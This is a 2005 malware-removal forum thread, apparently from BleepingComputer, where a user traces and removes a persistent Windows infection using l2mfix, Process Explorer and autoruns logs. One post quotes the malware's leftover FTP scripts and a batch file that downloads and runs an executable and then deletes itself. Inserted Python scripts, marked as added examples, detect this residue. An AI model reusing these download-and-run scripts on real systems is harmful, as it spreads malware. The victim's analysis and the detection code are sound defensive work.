
Dxmsrv.exe And Sticky Dll's

8 replies to this topic

#1 RuedigerPlantiko


  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 09 November 2005 - 04:20 AM

Dear bleepingcomputer team,

on Sunday, November 6, 2005 at 11h20m MET, a program called drsmartload.exe had
been downloaded and executed on my laptop (preceded by some stupid actions of mine
that I surely will never repeat... ). I found out that the program had been downloaded
from the following URL


And it is still there today, as I found when I tried. Maybe this information is helpful if somebody
is willing to analyze the machine code and understand what happens (I can't).

The program loaded several other "fine" resources onto the laptop. Since I was "googling"
at that time, I immediately realized that the browser (MSIE) behaviour had changed: on any request,
a redirect to a commercial website was performed, using a page containing something like
"roboweb" in the URL (it changed quickly, so I didn't get the exact URL). Also, a new
toolbar appeared in the top area with some more fine "Super Search" functions.

I immediately unplugged the laptop and stayed offline. Since then, I have tried to get rid
of my new friends.

1.) I found out that for all executed files, Windows XP makes an entry in a special folder
called C:\Windows\Prefetch (for performance reasons?). This folder was helpful for me as a log:
from the time stamps, I could see which programs had been executed immediately after drsmartload.exe.
Among others, a suspicious file named glb2.tmp had been executed.
I have a complete list and can post it if someone is interested.

2.) The new taskbar was easy to delete, using the IE menu item for managing toolbars.

3.) I looked in C:\Windows\system32 and found four new DLLs, all about 260 KB in size, which had been changed at the last restart.

4.) After each restart, these DLLs changed their names or were newly installed from another place,
unknown to me.

5.) I googled the names of these DLLs from a safe computer and found out that the names of
these DLLs led me to completely different virus/trojan definitions. So I assume that the names are
chosen with the purpose of putting the user on the wrong track.

6.) I tried to delete the DLLs manually, which worked for two of them; the other two could not be
deleted, as they were in use by another process. I could not find this process in taskmgr.exe;
all the processes listed there appeared harmless to me. The "tasklist" command was not known,
although it belongs to XP as a standard tool. Maybe it has been deleted from my computer by the
malware. Therefore, I could not identify the process ID of the blocking process and could not
kill it.

7.) I tried to get rid of the DLLs using safe mode. No chance, the process was there and blocked
two of them.

8.) Now, finally, I became so scared that I looked for some tools out there which could help me. I found
your tutorial "How to remove malware from your computer" and followed the advice.

9.) I downloaded l2mfix and cclean from a safe computer, transferring the executables to the laptop with the aid of a memory stick.

10.) I started cclean, after having made a copy of the C:\Windows\Prefetch dirlist, which seemed useful to me. This program cleaned most of the temporary files on the computer.

11.) I started l2mfix in mode 1 (analysis). Besides the suspicious .dll's in the system32 directory, it also listed 2 files in system32 named dxmsrv.exe and guard.tmp.

12.) guard.tmp was easy to delete. Afterwards, it did not appear in the file list of l2mfix,
however the l2mfix registry list shows that there still is a registry entry for it.

13.) dxmsrv.exe really was the best hint: After restarts, the names of the dll's changed, but the name dxmsrv.exe remained in all further restart/run of l2mfix cycles.

14.) Unfortunately, the file dxmsrv.exe is not displayed in the directory list of C:\Windows\system32, although it should be there, according to the l2mfix report. Of course, I have the flag "show hidden files" checked. Since it is not shown, I can not delete it. My attempt to delete it with a direct DOS delete call in an MS-DOS command prompt failed with an error like "dxmsrv.exe unknown".

15.) I found several web sites referring to dxmsrv.exe as a dangerous spy- and adware resource hog, the source of which is yet unknown. Well, I know the source (see above)...

16.) I downloaded autorun and analyzed the registered autoruns. Some of the current DLLs were registered. I deregistered them with the help of autorun, in safe mode. But no effect - after the next restart, the new DLLs were registered.

17.) Impatient as I was in the meantime, I tried mode 2 of l2mfix. I wanted to check whether the program is able to delete the file on its own. But I had no success.

18.) The report in mode 1 of l2mfix keeps showing my new fellows: The four or five dll's with varying and probably misleading names, and the dxmsrv.exe

I have no idea what to do now. I need professional help. Can you help me?

Thanks and regards,
Rüdiger Plantiko

P.S.: Here is a log of the last l2mfix run this morning:

These are the registry keys present
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wzcnotif]

RegDACL 5.1 - Permissions Manager for Registry keys for Windows NT 4 and above
Copyright © 1999-2001 Frank Heyne Software (http://www.heysoft.de)
This program is Freeware, use it on your own risk!

Access Control List for Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify:
(CI) DENY --C------- VORDEFINIERT\Administratoren
(ID-NI) ALLOW Full access VORDEFINIERT\Administratoren
(ID-IO) ALLOW Full access VORDEFINIERT\Administratoren

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]

Shell Extension key:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\AutorunsDisabled]

Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{08AC2978-5B57-42AF-98AA-D6E19F8E6EA5}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{08AC2978-5B57-42AF-98AA-D6E19F8E6EA5}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{F0893519-6796-4BDD-BC65-8A700A05834A}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{F0893519-6796-4BDD-BC65-8A700A05834A}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{0C5DDB1C-8F52-4371-BB82-BD87D356233B}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{0C5DDB1C-8F52-4371-BB82-BD87D356233B}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{D18D1AEA-4E0B-4A2E-B003-C24BC4F79477}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{D18D1AEA-4E0B-4A2E-B003-C24BC4F79477}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\CLSID\{C7FCCD2B-16D8-4FC5-ADD3-357270C66F75}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{C7FCCD2B-16D8-4FC5-ADD3-357270C66F75}\Implemented Categories\{00021492-0000-0000-C000-000000000046}]


Files Found are not all bad files:

m6lslg~1.dll Tue 8 Nov 2005 23:36:48 ..S.R 234'044 228.56 K
mufutil.dll Wed 9 Nov 2005 6:46:24 ..S.R 235'331 229.81 K
vfs_ps.dll Tue 8 Nov 2005 23:51:20 ..S.R 235'331 229.81 K

3 items found: 3 files (3 H/S), 0 directories.
Total of file sizes: 704'706 bytes 688.19 K
Locate .tmp files:

No matches found.
Directory Listing of system files:
Datenträger in Laufwerk C: ist System
Volumeseriennummer: AC89-BA57

Verzeichnis von C:\WINDOWS\System32

09.11.2005 06:46 235'331 mufutil.dll
08.11.2005 23:51 235'331 vfs_ps.dll
08.11.2005 23:36 234'044 m6lslg3716.dll
11.03.2005 18:00 90'852 dxmsrv.exe
4 Datei(en) 795'558 Bytes
0 Verzeichnis(se), 31'436'910'592 Bytes frei

//Mod edit: Hot link URL above edited to protect others

Edited by KoanYorel, 09 November 2005 - 04:47 AM.
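The two listings in the l2mfix log above can be triaged mechanically. The following Python is an added example, not part of the thread and not l2mfix's own code: it parses the "Files Found" rows and the System32 dir rows, groups the freshly written DLLs of near-identical size (the ~230 KB clones with System+ReadOnly flags), and reports files whose timestamp falls outside the incident window. The regexes, the 4 KB size tolerance and the window (6 Nov 11:20 to 9 Nov 2005, taken from the dates in the post) are assumptions of the example.

```python
"""Triage of an l2mfix-style report (added example; not part of the thread and
not l2mfix's own code).  It parses the two listings in the post, the "Files
Found" block with attribute flags and the dir-style listing of System32, and
surfaces what the poster spotted by hand: a cluster of freshly written DLLs of
nearly identical size with System+ReadOnly attributes, and files whose
timestamp lies outside the incident window (dxmsrv.exe is dated March)."""
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed input: lines copied from the log in the post above.
FILES_FOUND = """\
m6lslg~1.dll Tue 8 Nov 2005 23:36:48 ..S.R 234'044 228.56 K
mufutil.dll Wed 9 Nov 2005 6:46:24 ..S.R 235'331 229.81 K
vfs_ps.dll Tue 8 Nov 2005 23:51:20 ..S.R 235'331 229.81 K
"""
DIR_LISTING = """\
09.11.2005 06:46 235'331 mufutil.dll
08.11.2005 23:51 235'331 vfs_ps.dll
08.11.2005 23:36 234'044 m6lslg3716.dll
11.03.2005 18:00 90'852 dxmsrv.exe
4 Datei(en) 795'558 Bytes
"""
# Assumed incident window: the download on Sun 6 Nov 2005 11:20 up to the log of Wed 9 Nov.
INCIDENT_WINDOW = (datetime(2005, 11, 6, 11, 20), datetime(2005, 11, 9, 23, 59))

# "Files Found" row: name weekday day month year time flags bytes KB
FILES_RE = re.compile(
    r"^(?P<name>\S+)\s+[A-Za-z]{3}\s+(?P<stamp>\d{1,2}\s+[A-Za-z]{3}\s+\d{4}\s+\d{1,2}:\d{2}:\d{2})"
    r"\s+(?P<attr>[.A-Z]{5})\s+(?P<size>[\d']+)")
# German dir row: dd.mm.yyyy hh:mm bytes name (summary rows do not match)
DIR_RE = re.compile(r"^(?P<stamp>\d{2}\.\d{2}\.\d{4}\s+\d{2}:\d{2})\s+(?P<size>[\d']+)\s+(?P<name>\S+)$")


@dataclass
class Entry:
    name: str
    mtime: datetime
    size: int
    attrs: str = ""  # l2mfix flag column such as "..S.R"; empty for dir rows


def _parse(text, regex, fmt):
    """Run `regex` over every line; unmatched lines (headers, totals) are skipped."""
    out = []
    for line in text.splitlines():
        m = regex.match(line.strip())
        if m:
            stamp = datetime.strptime(" ".join(m["stamp"].split()), fmt)
            size = int(m["size"].replace("'", ""))  # the log uses ' as thousands separator
            out.append(Entry(m["name"], stamp, size, m.groupdict().get("attr", "")))
    return out


def parse_files_found(text):
    return _parse(text, FILES_RE, "%d %b %Y %H:%M:%S")


def parse_dir_listing(text):
    return _parse(text, DIR_RE, "%d.%m.%Y %H:%M")


def system_readonly(entries):
    """Rows flagged both System and ReadOnly in the l2mfix attribute column."""
    return [e for e in entries if "S" in e.attrs and "R" in e.attrs]


def find_clone_clusters(entries, tolerance=4096, min_members=2):
    """Group DLLs whose sizes sit within `tolerance` bytes of their neighbour:
    the 'near-identical ~230 KB clones' pattern described in the post."""
    dlls = sorted((e for e in entries if e.name.lower().endswith(".dll")), key=lambda e: e.size)
    clusters, current = [], []
    for e in dlls:
        if current and e.size - current[-1].size > tolerance:
            if len(current) >= min_members:
                clusters.append(current)
            current = []
        current.append(e)
    if len(current) >= min_members:
        clusters.append(current)
    return clusters


def outside_window(entries, start, end):
    """Files whose modification time does not fall inside the incident window."""
    return [e for e in entries if not start <= e.mtime <= end]


def triage(files_found, listing, window=INCIDENT_WINDOW):
    found, rows = parse_files_found(files_found), parse_dir_listing(listing)
    return {
        "system_readonly": [e.name for e in system_readonly(found)],
        "clone_clusters": [[e.name for e in c] for c in find_clone_clusters(rows)],
        "outside_window": [e.name for e in outside_window(rows, *window)],
    }


if __name__ == "__main__":
    for key, value in triage(FILES_FOUND, DIR_LISTING).items():
        print(f"{key}: {value}")
```

The out-of-window hit is the point the poster later reached by hand: dxmsrv.exe carries a March timestamp, so it belongs to an earlier event than the November download.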



#2 stidyup


  • Members
  • 641 posts
  • Gender:Male
  • Local time:08:22 AM

Posted 09 November 2005 - 08:04 AM

Sophos on drsmartload.exe

If you think you are infected submit a hijackthis log to the HJT Forum.

How to submit a hijackthis log

Download Hijackthis

Try running the following from safe mode (Getting to safe-mode): Sysclean. You'll also need the virus template file from here, lpt***.zip; remember to extract the contents of the zip file into the same folder as Sysclean.com.


DrWeb CureIT


KASFX which is powered by the Kaspersky AV engine, you will need internet access to update it. If you haven't got net access in safe mode, update it before you use it.

If you're good with the command line, also try the Sophos Command Line scanner. This command will scan all of your hdd's: SAV32CLI.EXE -F -di -remove -dn -mbr -all -zip -p=avscanlog.txt and give you a log file to review afterwards.

Also try installing and running A2 Free and Ewido

I'd also run Spybot(Spybot Tutorial) and Adaware

If you're using Win2K/XP run adaware/spybot from "safe mode with command prompt"

At the C:\ prompt type the following:-

C:\progra~1\spybot~1\spybotsd.exe /autocheck /autofix

#3 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 09 November 2005 - 09:56 AM

stidyup wrote (Nov 9 2005, 02:04 PM):
> Sophos on drsmartload.exe

Hi stidyup,

thanks for your quick reply and for the helpful links. Currently, I am in the office. I have
safe internet access from a second computer at home, from which I can download the
SW you recommended to me.

Of course, from my post it's pretty clear to me that the laptop is infected. If you are constrained
to the "Hijack This Log" output, I will append the output this evening. I thought the output of
l2mfix was sufficiently clear already.

My problem is probably not drsmartload.exe, but dxmsrv.exe. It seems that drsmartload.exe
was only the door through which all these black demons entered the computer. But the really
bad guy is dxmsrv.exe.

I will study it more deeply this evening...

Thanks again, and regards,

#4 stidyup


  • Members
  • 641 posts
  • Gender:Male
  • Local time:08:22 AM

Posted 09 November 2005 - 11:07 AM

If you need to scan a suspect file you can do it at these two sites jotti and Virus Total which use multiple AV scan engines.

#5 tg1911


    Lord Spam Magnet

  • Members
  • 19,274 posts
  • Gender:Male
  • Location:SW Louisiana
  • Local time:07:22 AM

Posted 09 November 2005 - 04:19 PM

I've split off your HJT log from your post here, and moved it to the "HijackThis Logs and Analysis" forum.

Here's a link to your log:
RuedigerPlantiko's HJT log

Please, DO NOT make another post in the HJT forum, until it has been responded to by a member of the HJT Team. The first thing they look for, when looking for logs to reply to, is 0 replies. If you make another post, there will be 1 reply. The team member, glancing over the replies, might assume someone is already helping you out, and will not respond. So, just make your post, and let it sit there, until a team member responds. This way you will be taken care of, in the most timely manner.

Edited by tg1911, 09 November 2005 - 04:21 PM.


#6 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 10 November 2005 - 02:59 AM

Here is a report of my yesterday evening actions:
  • Started Registry Toolkit
    It found 268 invalid entries; the free version deleted 51 of them,
    the invalid file extension associations, which have nothing
    to do with my problem.
    In the areas "Custom Controls" and "Deep Registry Scan",
    it found references to invalid DLL's which stem from my
    • guard.tmp
    • oldn.dll
    • bjap.dll
    • agctres.dll
    This was no new information for me.
    I will surely not buy this program, because I don't like
    the UI. Also, it does not generate a plain text log which
    is a disadvantage. (At least I didn't find one).
  • Started sysclean.com (trendmicro)
    I used the latest patterns lpt$vpn.935 and tmaptn.305.
    As you recommended, I started the program in safe mode.
    The program had a runtime of 2.5 hours.
    It found and deleted 12 infected files, but to my knowledge only one
    of them had been executed. The others were attachments of emails
    that I had never opened in my Eudora email client. I
    had deleted the emails long ago, but I have to check
    why the attachments were left over in Eudora's attachment folder.
    The file that had been executed was infected with a piece of
    malware called TROJ_DLOADER.AEJ
After this session it was 0:30 a.m. I was too tired to continue
the fight against dxmsrv.exe. I checked the system32 folder: it
still contained four DLLs changed at that time. They had new
names, again. I started l2mfix again. It kept telling me that there
is a file dxmsrv.exe in C:\Windows\system32. I still could
neither see nor delete this file, neither in the File Explorer nor by
using the DOS console.

In other words: all my problems have survived these actions.

Since I don't have time to check all the other nice antivirus programs
out there, I have to focus on the fight against dxmsrv.exe and the
sticky DLL's. Removing the registry entries referring to the DLL's
was of no effect. After the restart, there are new registry entries. My
strategy should therefore be:
  • to identify and kill the process running dxmsrv.exe
    I found out that tasklist.exe is not part of the XP Home distribution. I will
    therefore download the sysinternals tool Process Explorer and
    use it this evening to obtain more information.
  • to identify and delete the file dxmsrv.exe (how does l2mfix find it????)
  • to delete all the suspicious DLL's in the system32 folder.
When this is done, the danger will be banished. The invalid registry entries may be
deleted in a second step. I will continue the fight this evening...

For this plan, I have two strange tasks (help appreciated!!!):
  • How to remove a program that doesn't show up in the dirlists?
    Sounds strange, but it is like this. I don't know how this can be made to happen.
    But it is like this: l2mfix does find the program, DOS and explorer don't. Is
    this a renaming trick? It sounds incredible to me that a virus manipulates
    the system functions for directory listing, in both DOS console and explorer.
    Are there examples of such masterpieces?
  • How to identify a running process that doesn't show up in TaskMgr?
    I will try sysinternal's process explorer this evening.

P.S.: On castlecop.com, I find the following information:

Name: dxmsrv
Command: dxmsrv.exe
Status: X
Description: Added by an unidentified WORM or TROJAN!

But what does this mean? How can I delete it? A process is a process, from
wherever it was started. When I want to delete the DLLs, I get the message
that some of them are blocked by another process. I need to find out the
blocking process, so that I can kill it. tasklist.exe is not available, as mentioned.
sysinternal's procexp may help me.

Edited by RuedigerPlantiko, 10 November 2005 - 03:11 AM.

#7 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 10 November 2005 - 05:22 PM

:thumbsup: the fight is won! :flowers:

This night, the third session about the virus, I have won the fight. Special thanks to
sysinternals.com, they have great tools, and to the authors of l2mfix, and of course
to the bleepingcomputer team for giving me valuable suggestions.

I followed the strategy I had planned over the day (outlined above):

To minimize the number of active processes, I worked in safe mode. The system32
folder was populated with an impressive number of DLLs with a last change time of
this week, all about 230 KB in size. Most of them could be deleted by hand, except 2
of them. With each new start of the computer, new clones are added in the system32
directory. For the information of other victims, I give here a list of these dll names:


I didn't check it, but I guess that they are real clones, i.e. they should contain almost identical code.
The sizes were about 230 KB, differing slightly from one another.

I deleted all of these creatures that were deletable, emptied the tray and remained with two dll's
for which the system announced that they can't be deleted. These were guard.tmp and owe2.dll (but
it is arbitrary, in earlier sessions other dll's were blocked).

I started sysinternals process explorer (procexp) to find out which process blocks them. To my
surprise, there was no hidden process (I expected dxmsrv.exe to show up here), but it was
explorer.exe and rundll32.exe!

I decided to kill explorer.exe and rundll32.exe, which was possible even with the task manager. The start
menu bar etc. disappeared; I remained with the TaskMgr. From there I started (with "New->Task
(execute)") a console, switched to C:\windows\system32 and could easily delete the two last dll's that
were remaining.

I then cleaned up the registry with sysinternal's tool autoruns. I deleted all entries referring to
non-existing files. There were several entries referring to one of the dll's given above.

After this, I generated a new l2mfix scan. The references to suspicious files were reduced to only one
entry: The famous dxmsrv.exe which still is a mystery to me. I couldn't locate it in the
c:\windows\system32 folder, where it should be, according to l2mfix. Later more...

With fingers crossed, I rebooted. Victory! No new DLLs were appearing in the system32 folder!!!
This means the mechanism of the virus to continuously create replicas of itself with varying and probably
misleading names was broken by the operations described here.

But what about dxmsrv.exe? It's still a mystery which is not yet resolved completely. I scanned the
complete C drive for files with this name - nothing. Finally I came to the idea to look at the time stamp
of the entry in the l2mfix protocol. The line was:

11.03.2005 18:00 90.852 dxmsrv.exe

I looked for entries in C:\windows\system32 having this change date. I found several strange
files which obviously contained instructions for getting .exe files by ftp from some source. Example:
File named cmd.ftp with the content:

open 1023
get 30187_upload.exe

This looks like a Microsoft patch download. Or SHOULD it only look like this????

Another one was named .pif, i.e. it had no file name. It contained a similar

open 14024
user a a
GET syswork.exe

There was a similar file o (no extension) to get an executable named wvsvc.exe, and
a batch file c.bat which performed the ftp using the script file .pif and then executed
the downloaded file syswork.exe:

@echo off
ftp -n -v -s:.pif
del .pif
del /F c.bat
exit /y

Furthermore, there were several files with names starting with TFTP and having no extension.
Most of them had size 0. But three of them contained binary information of about 110 KB.

All these files, dated from March 11, 17:38 to 18:07, looked very suspicious to me. I have moved
them into a special folder named sys32_quarant. But l2mfix keeps listing dxmsrv.exe. I
have to look at this further.

I will keep the laptop unplugged until the dxmsrv.exe mystery is solved. But I think
the steps of today fixed my virus problem.

Good night,

Questions (added 1 day later):
  • Is there anybody out there who has had some experience with dxmsrv.exe?
  • Where does l2mfix get the information about the existence of dxmsrv.exe - if not from the file system?
Thank you!

Edited by RuedigerPlantiko, 11 November 2005 - 12:04 PM.
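The cmd.ftp, .pif and c.bat files quoted in the post above are a recognisable shape of downloader residue. The following Python is an added example, not from the thread or from any tool it mentions: it walks a directory and flags FTP command scripts that fetch an executable, batch files that drive ftp with a -s:script, extensionless TFTP* leftovers, and names consisting only of an extension. The sample tree it builds in a temporary directory reuses the contents quoted in the post; the TFTP name and the two benign files are constructed for the test.

```python
"""Scanner for the downloader residue described in the post above (added
example; not part of the thread or of any tool it mentions).  It walks a
directory and flags: FTP command scripts that fetch an executable, batch
files that drive ftp.exe with -s:<script>, extensionless TFTP* leftovers,
and names that consist only of an extension such as ".pif"."""
import re
import tempfile
from pathlib import Path

# Constructed sample tree: the first three contents are the ones quoted in the
# post; the TFTP name and the two benign files are made up for the test.
SAMPLE_FILES = {
    "cmd.ftp": "open 1023\nget 30187_upload.exe\n",
    ".pif": "open 14024\nuser a a\nGET syswork.exe\n",
    "c.bat": "@echo off\nftp -n -v -s:.pif\ndel .pif\ndel /F c.bat\nexit /y\n",
    "TFTP3344": "",                               # zero-byte transfer leftover
    "kernel32.dll": "MZ\x90\x00",                 # binary stub, must not be flagged
    "readme.txt": "open the settings dialog\n",  # prose that starts with 'open'
}

FTP_COMMANDS = {"open", "user", "pass", "bin", "binary", "ascii", "prompt",
                "cd", "lcd", "get", "mget", "quit", "bye"}
EXEC_SUFFIXES = (".exe", ".pif", ".scr", ".com", ".bat", ".dll")
# ftp or ftp.exe invoked with a script file: "ftp -n -v -s:.pif"
FTP_BATCH_RE = re.compile(r"\bftp(\.exe)?\b[^\r\n]*\s-s:", re.IGNORECASE)


def looks_like_ftp_script(text):
    """Every line is an ftp command, the first opens a connection, and at
    least one get/mget targets an executable."""
    lines = [line.split() for line in text.splitlines() if line.strip()]
    if not lines or lines[0][0].lower() != "open":
        return False
    if any(words[0].lower() not in FTP_COMMANDS for words in lines):
        return False
    return any(words[0].lower() in ("get", "mget")
               and words[-1].lower().endswith(EXEC_SUFFIXES) for words in lines)


def classify(path):
    """Return the list of reasons a file is suspicious (empty if none)."""
    reasons = []
    try:
        text = path.read_bytes().decode("latin-1")  # never fails on arbitrary bytes
    except OSError:
        return reasons
    if looks_like_ftp_script(text):
        reasons.append("ftp-script")
    if FTP_BATCH_RE.search(text):
        reasons.append("ftp-batch")
    name = path.name
    if name.upper().startswith("TFTP") and "." not in name:
        reasons.append("tftp-residue")
    if name.startswith(".") and "." not in name[1:]:
        reasons.append("dot-only-name")
    return reasons


def scan(directory):
    """Map file name -> reasons for every file in `directory` that matches."""
    hits = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            reasons = classify(path)
            if reasons:
                hits[path.name] = reasons
    return hits


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="sys32_sample_"))
    for name, content in SAMPLE_FILES.items():
        (root / name).write_bytes(content.encode("latin-1"))
    return str(root)


if __name__ == "__main__":
    for name, why in scan(build_sample_tree()).items():
        print(f"{name}: {', '.join(why)}")
```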

#8 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 15 November 2005 - 04:11 AM

:thumbsup: I had placed the smiley too early in my last posting...

Actually, there still is something on the machine which I can't detect any further.

A new file named ultra.dll showed up in C:\windows\system32.
The file shows as empty, however (0 Bytes).

I will keep this log up to date with any further information.

My next plans:
  • Start the computer from a boot CD and scan the directory from there for dxmsrv.exe which still
    shows up in l2mfix.
  • Search for a boot virus
  • If nothing else helps: format C: and reinstall Windows XP Home. I have wasted too much time with this bullbleep, already.

#9 RuedigerPlantiko

  • Topic Starter

  • Members
  • 7 posts
  • Local time:02:22 PM

Posted 07 December 2005 - 03:11 AM

Just to complete this posting with the sad last chapter:

I have burned the "ultimatebootcd" from www.ultimatebootcd.org, so I was able to
start the computer from the CD. However, most of the tools on that CD were unable
to even detect the C drive. It seems that a piece of software was missing to make the
NTFS-formatted C drive visible to these tools. Only one program was able to read and
display the contents of the C drive. With this tool, I found that indeed the file dxmsrv.exe
was on C:\Windows\system32, as the program l2mfix had detected. However, with the
tools from the ultimatebootcd one could only read, not write or delete files.

Since I was not sure whether this program might still be used or activated at some
time (like a "sleeper"), I finally decided to delete everything and to reinstall Windows
from scratch.

I have learned a lot about PCs in the last weeks. And I have become more sensitive
about the virus issues: it seems that in the last three, four years malware production
has been professionalized and is in the hands of skilled full-time developers. As a
consequence, AV software with runtime virus detection and a good firewall is an
absolute must.

